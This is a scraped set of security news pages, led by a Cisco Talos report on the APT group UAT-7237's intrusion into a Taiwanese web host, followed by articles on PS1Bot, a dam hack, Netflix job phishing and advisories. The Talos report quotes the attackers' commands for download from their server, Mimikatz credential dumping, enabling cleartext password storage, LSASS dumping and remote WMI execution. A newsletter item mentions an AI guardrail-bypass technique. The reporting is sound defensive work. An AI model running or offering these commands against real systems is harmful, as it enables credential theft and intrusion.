Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.

*   Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.
*   UAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies heavily on the use of open-sourced tooling, customized to a certain degree, likely to evade detection and conduct malicious activities within the compromised enterprise.
*   UAT-7237 aims to establish long-term persistence in high-value victim environments.
*   Talos also identified a customized Shellcode loader in UAT-7237's arsenal that we track as “SoundBill.” SoundBill can be used to decode and load any shellcode, including Cobalt Strike.

Talos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on establishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of open-sourced tools, customized to a certain extent, including the use of a customized Shellcode loader we track as “SoundBill.”

Talos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918. Additionally, both threat groups develop, customize and operate tooling using the Chinese language as their preliminary language of choice.

While Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics, techniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:

*   UAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant while UAT-5918 relies primarily on Meterpreter based reverse shells.
*   After a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237's deployment of web shells is highly selective and only on a chosen few compromised endpoints.
*   While UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a combination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the same.

In a recent intrusion, UAT-7237 compromised, infiltrated and established long term persistence in a Taiwanese web hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform several malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke malware, setting up backdoored access via VPN clients, network scanning and proliferation.

**Initial access and reconnaissance**

UAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet. Once the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts rapid fingerprinting to evaluate if the target is worth conducting further malicious actions on.

Reconnaissance consists of identifying remote hosts, both internal and on the internet:

cmd /c nslookup <victim’s\_domain>
cmd /c systeminfo
cmd /c curl
cmd /c ping 8\[.\]8\[.\]8\[.\]8                            
cmd /c ping 141\[.\]164\[.\]50\[.\]141          // Attacker controlled remote server.
cmd /c ping <victim’s\_domain>
cmd /c ipconfig /all

While UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237 deviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access, and later access the systems via RDP:

cmd /c c:\\temp\\WM7Lite\\download\[.\]exe  hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar c:\\temp\\WM7Lite\\1\[.\]rar

powershell (new-object System\[.\]Net\[.\]WebClient).DownloadFile('hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/vpn\[.\]rar','C:\\Windows\\Temp\\vmware-SYSTEM\\vmtools\[.\]rar')

Once UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to additional systems in the enterprise to proliferate and conduct malicious activities:

cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&net use
cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&dir \\\\<remote\_smb\_share>\\c$\\
cmd\[.\]exe /c cd /d "C:\\"&net group "domain admins" /domain
cmd\[.\]exe /c cd /d "C:\\"&net group "domain controllers" /domain

In addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows Management Instrumentation (WMI) based tooling during reconnaissance and proliferation such as SharpWMI and WMICmd:

cmd\[.\]exe /c cd /d "C:\\"&C:\\ProgramData\\dynatrace\\sharpwmi\[.\]exe <IP> <user> <pass> cmd whoami

cmd.exe /c cd /d "C:\\DotNet\\"&WMIcmd.exe

wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c whoami
  
wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c netstat -ano >c:\\1.txt

 SharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary command and code executions.

UAT-7237 fingerprinted any systems subsequently accessed using rudimentary window commands such as:

cmd.exe /c systeminfo
cmd.exe /c tasklist
cmd.exe /c net1 user /domain
cmd.exe /c whoami /priv
cmd.exe /c quser

**Post-compromise tooling and actions on objectives****SoundBill**

After compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of tasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as “SoundBill.” SoundBill is built based on  “VTHello” and is a shellcode loader written in Chinese that will decode a file on disk named “ptiti.txt” and execute the resulting shellcode.

It is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese instant messaging software, and are likely used as decoy files in attacks involving spear phishing.

SoundBill’s payload (i.e., the shellcode) may be anything from, for example, a customized implementation of Mimikatz:

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

Or it may be a mechanism to execute arbitrary commands on the infected system, such as:

c:\\temp\\vtsb.exe -c whoami

The shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long term access for information stealing. So far, the Cobalt Strike beacons Talos have found to be compatible with SoundBill communicate over HTTPS with its command and control (C2): cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws

**JuicyPotato**

UAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to execute multiple commands on endpoints such as:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami

**Configuration changes**

During intrusions on several occasions, UAT-7237 attempted to make configuration and setting changes to the Windows OS on the infected endpoints, such as disabling User Account Control (UAC) restriction via registry:

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG\_DWORD /d 1 /f

They also attempted to enable storage of cleartext passwords:

reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f

UAT-7237 also accessed the Component Services management console, likely to adjust privileges for their malicious components:

mmc comexp.msc

**UAT-7237's pursuit of credentials**

UAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints. However, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection by using a Mimikatz instance built into SoundBill to extract credentials:

**Filename/command**

**Tooling name**

abc.dll

Comsvcs.dll for LSASS process dumping

Fileless.exe

Mimikatz

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

SoundBill with the Mimikatz payload

Furthermore, UAT-7237 also finds VNC credentials and configuration from infected endpoints by searching the registry and disk:

reg query "HKCU\\Software\\ORL\\WinVNC3\\Password"
dir c:\\\*vnc.ini /s /b

Another (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file and another executable — again for credential extraction:

cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c  C:\\hotfix\\1.bat"
cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c   C:\\hotfix\\Project1.exe  C:\\hotfix\\SSP.dll"

“Project1\[.\]exe” above is the ssp\_dump\_lsass project on GitHub. It takes a DLL file as an argument, injects it into the Local Security Authority Service (LSASS)  process, which then dumps the LSASS process into a BIN file.

Optionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c  {e60687f7-01a1-40aa-86ac-db1cbf673334} -p "c:\\windows\\system32\\cmd.exe"  -a "/c c:\\hotfix\\1.bat"

The process dump obtained is then staged into an archive for exfiltration:

cmd.exe /c "c:\\program files\\7-Zip\\7z.exe"  a  C:\\hotfix\\1.zip  C:\\hotfix\\1.bin

**Proliferating through the enterprise**

UAT-7237 uses the following network scanning tooling:

**FScan:** A network scanner tool used to scan for open ports against IP subnets:

fileless -h 10.30.111.1/24 -nopoc -t 20

**SMB scans:** To identify SMB services information on specific endpoints:

smb\_version 10.30.111.11 445

As soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using credentials they’ve extracted previously:

cmd\[.\]exe /c netstat -ano |findstr 3389
cmd\[.\]exe /c nslookup <victim’s\_subdomains>
cmd\[.\]exe /c net use  <IP>\\ipc$ <pass>  /user:<userid>
cmd\[.\]exe /c dir   \\\\<remote\_system>\\c$
cmd\[.\]exe /c net use  \\\\<remote\_system>\\ipc$ /del

**SoftEther VPN**

The remote server hosting the SoftEther VPN client consisted of two archives: one containing the Client executable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based server binary.

Talos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:

*   The server was created in September 2022 and was last used in December 2024, indicating that UAT-7237 may have been using SoftEther over a two-year period.
*   UAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language configuration file, indicating that the operators were proficient with the language.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort rules cover this threat:

*   Snort v2 : 64908 - 64916
*   Snort v3: 301209 - 301212

**IOCs**

 IOCs for this research can also be found at our GitHub repository here. 

450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a - C:\\temp\\wmiscan.exe
6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa - c:/hotfix/Project1.exe - ssp\_dump\_lsass tool
E106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 - C:/hotfixlog/Fileless.exe - FScan
B52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 - C:/hotfixlog/smb\_version.exe
864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe - Mimikatz
 
SoundBill
Df8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386
 
Cobalt Strike
0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7
7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f
 
cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws
http\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar
141\[.\]164\[.\]50\[.\]141

UAT-7237 targets Taiwanese web hosting infrastructure

Cisco Talos researchers have discovered a dangerous new malware framework called PS1Bot. Active since early 2025, this sophisticated…

Cisco Talos researchers have discovered a dangerous new malware framework called PS1Bot. Active since early 2025, this sophisticated threat spreads through malvertising and is designed to steal cryptocurrency wallets, passwords, and other sensitive information.

Hackread.com has learned about a new, highly active cyberattack from research carried out by cybersecurity experts at Cisco Talos. Their technical blog post, shared exclusively with us, details a new type of malicious software called PS1Bot.

****What is PS1Bot?****

PS1Bot is a powerful and sneaky malware framework that has been very active since early 2025. It gets its name, in part, from being created with PowerShell, a programming language often used on Windows computers.

What makes PS1Bot so dangerous is its ability to perform multiple harmful actions. It can steal sensitive information, record what you type (a process known as keylogging), and take screenshots of your computer. It can even take over your system and stay there even after you restart your computer.

The research also highlights the malware’s particularly effective information-stealing capabilities, noting that it specifically targets passwords, browser cookies, and even cryptocurrency wallet seed phrases.

The malware is designed to be hard to detect. It uses a clever trick called in-memory execution, which means it runs its harmful programs directly in your computer’s memory instead of saving them as files on your hard drive. This makes it much harder for antivirus software to spot. Researchers also found that the malware checks to see if antivirus programs are installed on a system before proceeding with its full attack.

****How Does it Spread?****

According to Cisco Talos research, the malware is primarily spread through malicious online advertising, also known as malvertising. People searching online for common things like “medicare benefit policy manual” or “Counting Canadian Money Worksheets Pdf” might be led to a website that secretly downloads a compressed file to their computer. Inside these files is a seemingly harmless file named FULL DOCUMENT.js that, when opened, downloads and runs the PS1Bot malware.

> _“The victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns.”_
> 
> Cisco Talos

****A Growing Threat****

Cisco Talos has been tracking this campaign all year and has seen a steady flow of new versions of the malware, which suggests that the creators are constantly improving it. The researchers noted similarities between PS1Bot and other malware families, like AHK Bot and Skitnet, which suggests the same cybercriminals might be behind these different threats.

The research shows that this malware is a rapidly evolving and serious risk to anyone using the internet. To protect yourself, always be careful about what you download. Even if a file name looks familiar, like a manual or a document, be suspicious if it comes from a strange or unexpected website. Also, avoid clicking on suspicious pop-up ads and stick to reputable websites.

New Malvertising Attack Spreads Crypto Stealing PS1Bot Malware

Cybercriminals are auctioning off live email credentials, giving other criminals access to sensitive systems, confidential intelligence, and, potentially, a higher success rate than ever.

Police &amp; Government Email Access for Sale on Dark Web

A vulnerability in the Python-Future 1.0.0 module allows for arbitrary code execution via the unintended import of a file named test.py. When the module is loaded, it automatically imports test.py, if present in the same directory or in the sys.path. This behavior can be exploited by an attacker who has the ability to write files to the server, allowing the execution of arbitrary code.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-xqrq-4mgf-ff32: Python-Future Module Arbitrary Code Execution via Unintended Import of test.py

Hazel braves Vegas, overpriced water and the Black Hat maze to bring you Talos’ latest research — including a deep dive into the PS1Bot malware campaign.

Thursday, August 14, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

Last week I flew 5,000 miles to Las Vegas for Black Hat USA. After navigating the casino carpet labyrinth and finding the only venue in Nevada that serves a proper English breakfast tea with milk (lifesaver), I’ve decided Black Hat feels exactly like trying to run in a dream — you’re always heading somewhere, never quickly, and the water costs $8.

I don’t mean to complain (although, as a Brit, I’m practically obligated to file a formal grievance about the weather, tea or queue length). In truth, it was a brilliant week, and I got to watch my fellow Talosians deliver some outstanding presentations and research.

Rather than recap everything we did (our YouTube channel will have plenty of research highlights soon), here are three standouts: 

*   **Joe Marshall’s live incident-response exercise** – Joe ran _Backdoors & Breaches_, an interactive card game originally developed with NetHope and NGO-ISAC for humanitarian non-governmental organizations. At Black Hat, he adapted it for a lunch-and-learn with over 60 participants, guiding them through a simulated cybersecurity crisis. If you’re curious, you can find the cards online here. With a websharing tool, you can stream it to any size audience and have people play along virtually. You can also read more about Joe’s experience developing the game, alongside a video walkthrough, in his new blog post.
*   **Amy Chang’s AI guardrail bypass research** – Amy’s booth talk revealed a novel way to break the guardrails of generative AI by tricking it into repeating human-written content verbatim, a technique called “_decomposition.”_ Her work drew attention from media outlets including TechRepublic, SecurityWeek and WebProNews.
*   **Philippe Laulheret’s _ReVault_ presentation** – Philippe, from our Vulnerability Research and Discovery team, revealed vulnerabilities in embedded security chips affecting millions of laptops, potentially allowing attackers to bypass Windows login or install persistent malware. A few days ago, he published a longer version of his investigation, so you can now read the full technical deep dive covering the research process and exploit breakdown.

We’ll have more to share soon, including a behind-the-scenes tour of the Black Hat Network Operations Center (NOC).

**The one big thing **

Cisco Talos has identified a widespread malvertising campaign distributing a multi-stage malware framework Talos calls “PS1Bot,” which uses PowerShell and C# modules to steal sensitive information, log keystrokes, capture screenshots, and maintain persistent access on infected systems. PS1Bot employs in-memory execution and modular updates, targeting browser credentials, cryptocurrency wallets, and more, while minimizing its footprint to evade detection. The campaign has been active and rapidly evolving throughout 2025. 

**Why do I care? **

Casual browsing and downloading seemingly safe files can lead to infection, putting your personal data, passwords and financial info at risk — especially if you use cryptocurrency wallets or save passwords in browsers. 

**So now what? **

Be extra cautious when downloading files from search results or ads, keep your security software updated, and use dedicated password managers and security tools instead of storing sensitive info in browsers. Stay informed about evolving threats like PS1Bot, as attackers are constantly updating their tactics. Talos' blog also provides Snort SIDs and ClamAV detections. 

**Top security headlines of the week **

**Russian government hackers said to be behind US federal court filing system hack**   
The Russian government is allegedly behind the data breach affecting the U.S. court filing system known as PACER, according to The New York Times. (TechCrunch) 

**North Korean Kimsuky hackers exposed in alleged data breach**   
The North Korean state-sponsored hacking group known as Kimsuky has reportedly suffered a data breach after two hackers stole the group's data and leaked it publicly online. (Bleeping Computer) 

**Exclusive: Brosix and Chatox promised to keep your chats secured. They didn’t.**   
A researcher contacted DataBreaches after finding an unsecured backup with 155.3 GB of unique compressed files. The researcher first logged the backup as exposed in late April. (DataBreaches) 

**Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs**   
The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability was exploited to breach "critical organizations" in the country. (Bleeping Computer) 

**Russian hackers exploited WinRAR zero-day in attacks on Europe, Canada**   
A Russian threat group has been observed exploiting a WinRAR zero-day vulnerability (now patched) as part of a cyberespionage campaign aimed at organizations in Europe and Canada. (SecurityWeek) 

**Can’t get enough Talos? **

*   **Microsoft Patch Tuesday for August 2025**   
    Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.   
*   **ReVault! When your SoC turns against you… deep dive edition**   
    Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling “ReVault.” 100+ models of Dell Laptops are affected by this vulnerability if left unpatched. The ReVault attack can be used as a post-compromise persistence technique that can remain even across Windows reinstalls. 
*   **The TTP:** **Cyber criminals brought PowerShell 1.0 to a modern ransomware fight**   
    Groups like Qilin are using custom encryptors, uncommon RMM tools, and even PowerShell 1.0 (yes, from 2006) to quietly recon networks. 
*   **Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst**   
    A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages). 

**Upcoming events where you can find Talos **

BlueTeamCon (Sept. 4 – 7) Chicago, IL 

LABScon (Sept. 17 – 20) Scottsdale, AZ 

VB2025 (Sept. 24 – 26) Berlin, Germany 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201 

**SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0**   
MD5: 8c69830a50fb85d8a794fa46643493b2    
VirusTotal: https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0   
Typical Filename: AAct.exe    
Claimed Product: N/A    
Detection Name: PUA.Win.Dropper.Generic::1201 

**SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08**   
MD5: 906282640ae3088481d19561c55025e4   
VirusTotal: https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08    
Typical Filename: AAct\_x64.exe   
Claimed Product: N/A   
Detection Name: PUA.Win.Tool.Winactivator::1201

What happened in Vegas (that you actually want to know about)

Dark Reading's Terry Sweeney and Google's Loren Hudziak  discuss how the humble web  browser has transformed from a simple web access tool into a common conduit through which a lot of business is done.

Google Chrome Enterprise: Extend Protections From Browser to OS

Beware of fake Netflix job offers! A new phishing campaign is targeting job seekers, using fraudulent interviews to…

Beware of fake Netflix job offers! A new phishing campaign is targeting job seekers, using fraudulent interviews to trick them into handing over Facebook logins. Find out what to look for to protect your accounts.

Job seekers are being targeted by a new phishing scam that uses fake Netflix job offers to steal Facebook login details. The campaign, which focuses on marketing and social media professionals, was reported by security researchers at Malwarebytes.

Malwarebytes shared details of the campaign with Hackread.com, noting its advanced techniques and focus on corporate social media accounts. The scam begins with a highly convincing, AI-generated email that looks like an official interview invitation from Netflix’s HR team. The email is personalised as per the recipient’s professional background.

****How the Scam Works****

According to Malwarebytes’ report, when a job seeker clicks the “Schedule Interview” link in the email, they are directed to a fake career site that looks like a real Netflix page. However, a quick check of the web address reveals it’s a fraudulent site.

The site then prompts users to create a “Career Profile,” offering a choice to either log in with Facebook or use an email address. But no matter which option is chosen, the next screen asks the user to sign in using their Facebook account. This is the crucial step of the scam. As the provided image of the sign-in page shows, the scammers are specifically after Facebook credentials.

This part of the attack is especially clever. The hackers use a special websocket method to instantly capture the login details as they are entered. As soon as the victim clicks “Log In,” the scammers can try to access the victim’s real Facebook account.

Even if the password is wrong, the attacker’s quick response time means they could have already compromised the account. The schedule page itself also shows the deceptive nature of the site.

The phishing email, what happens upon clicking the link and how a fake Facebook login page opens (Source: Malwarebytes)

> _“This login page is also the part that makes this attack a very sophisticated one. The phishers use a websocket method that allows them to intercept submissions live as they are entered. This allows them to try the credentials and if your password works, they can log into your real Facebook account within seconds. They could potentially ask for multi-factor authentication (MFA) confirmation if that’s necessary, too.”_
> 
> Pieter Arntz – Malware Intelligence Researcher, Malwarebytes

****The Real Danger****

The ultimate goal of this scam is not just to steal personal Facebook accounts. Hackers are targeting professionals who have access to corporate Facebook business accounts. By gaining control of these accounts, they can launch malicious ad campaigns, demand a ransom for access, or use the company’s reputation to trick more people.

Therefore, to stay safe, unsuspecting users, especially job seekers, must be cautious of job offers they didn’t apply for, check website addresses carefully, and use a reliable security solution on all devices.

Netflix Job Phishing Scam Steals Facebook Login Data

When a guest user accesses a chart in Apache Superset, the API response from the /chart/data endpoint includes a query field in its payload. This field contains the underlying query, which improperly discloses database schema information, such as table names, to the low-privileged guest user.

This issue affects Apache Superset: before 4.1.3.

Users are recommended to upgrade to version 4.1.3, which fixes the issue.

GHSA-9g5x-mm39-wg9r: Apache Superset data query improperly discloses database schema information to low-privileged guest user

Norway says pro-Russian hackers breached a dam in Bremanger in April, opening a water valve for 4 hours…

Norway says pro-Russian hackers breached a dam in Bremanger in April, opening a water valve for 4 hours after exploiting a weak password. Officials call it part of a wider hybrid warfare campaign targeting Europe.

Norwegian authorities have officially blamed pro-Russian hackers for a cyberattack on a dam in western Norway this past April. According to Beate Gangås, the head of the Norwegian Police Security Service (PST), the breach at the dam in the Bremanger municipality was part of a broader strategy by Russia, described as “hybrid warfare.”

The attack, while not causing major damage, was intended to “cause fear and chaos” among the public and “demonstrate what they are capable of,” Gangås said at a recent public event.

“The aim of this type of operation is to influence and to cause fear and chaos among the general population. Our Russian neighbour has become more dangerous,” Beate Gangås

****What Happened?****

The cyberattack occurred at the Lake Risevatnet dam in the municipality of Bremanger, which is not used for electricity production. As per Hackread.com’s coverage of this incident in June 2025, unidentified hackers managed to break into the dam’s remote-control system. They then opened a water valve, releasing 500 litres (about 132 gallons) of water per second for a full four hours before the problem was discovered and the valve was shut.

While the attack didn’t cause any injuries or significant damage, it did highlight a major security flaw. The initial breach was suspected to be a result of the dam’s web-accessible control panel being protected by a weak password. This vulnerability allowed the attackers to gain direct access to the dam’s operational systems, demonstrating how simple vulnerabilities can risk critical infrastructure.

The Dam in Risevatnet in Bremanger (Source: vg.no)

Interestingly, a pro-Russian cyber group reportedly posted a three-minute video on Telegram showing the dam’s control panel, seemingly taking credit for the attack, revealed police attorney Terje Nedrebø Michelsen. This action, officials claim, is a typical tactic used by state-backed groups to brag about their capabilities without officially being tied to the incident.

****A Wider Threat****

This comes after officials had previously warned of the potential for such attacks. The head of the Norwegian Intelligence Service, Nils Andreas Stensønes, echoed this concern, calling Russia the biggest threat to Norway’s security.

The Associated Press has been tracking this campaign, charting more than 70 incidents across Europe that have been blamed on Russia. These include vandalism and arson to attempted assassinations, which Western officials have described as “reckless” and violent.

In a separate, but related event, a hacking group with suspected links to Russia breached a Texas water facility’s system in January 2024, causing it to overflow. The Russian embassy in Oslo has denied the accusations, calling them “unfounded and politically motivated.”

Neither incident should come as a surprise, as in November 2024, 73% of industrial control systems (ICS) in Europe and the United States were found vulnerable to remote attacks.

Norway Blames Pro-Russian Hackers for Dam Cyberattack

Scammers are sending out fake Netflix job offers to get control of Facebook accounts.

In what seems a phishing attack targeted at a certain audience, scammers are impersonating Netflix and reaching out to marketing staff.

The initial mail looks like what you might expect from a headhunter or a human resources (HR) recruitment specialist.

“I hope this note finds you well,” the email begins. “Your reputation as a visionary marketing leader has caught out attention, and I’d like to share an extraordinary opportunity with you at Netflix.”

Undoubtedly this email is crafted by AI and based on real-life examples. The role offered in the email as VP of Marketing would be a fitting role for the person that received this email, so it looks as if the scammers have done their research before reaching out.

Replying to the initial mail—which is not recommended, unless you like letting scammers know you exist and encouraging them to send you more phishes—got us one step closer to landing the exciting new job at Netflix.

We received an invitation to set up an interview with the ‘Netflix HR team’.  

Following the link under “Schedule Interview” gets us a block by Malwarebytes web protection.

Again, not something we would want our readers to do but in the interest of learning more about the scam, we bypass that block and proceed to the website.

We find that there are 20 openings, all more or less in the same fields of social media and marketing.

The website itself is a mix of content copied from the actual Netflix site and of the phishing campaign.

Back to scheduling our interview. We’re given an option to choose our interview slot:

Regardless of which of the two buttons you use on the screen, you’ll be asked to sign in to your existing “Career Profile” or create a new one.

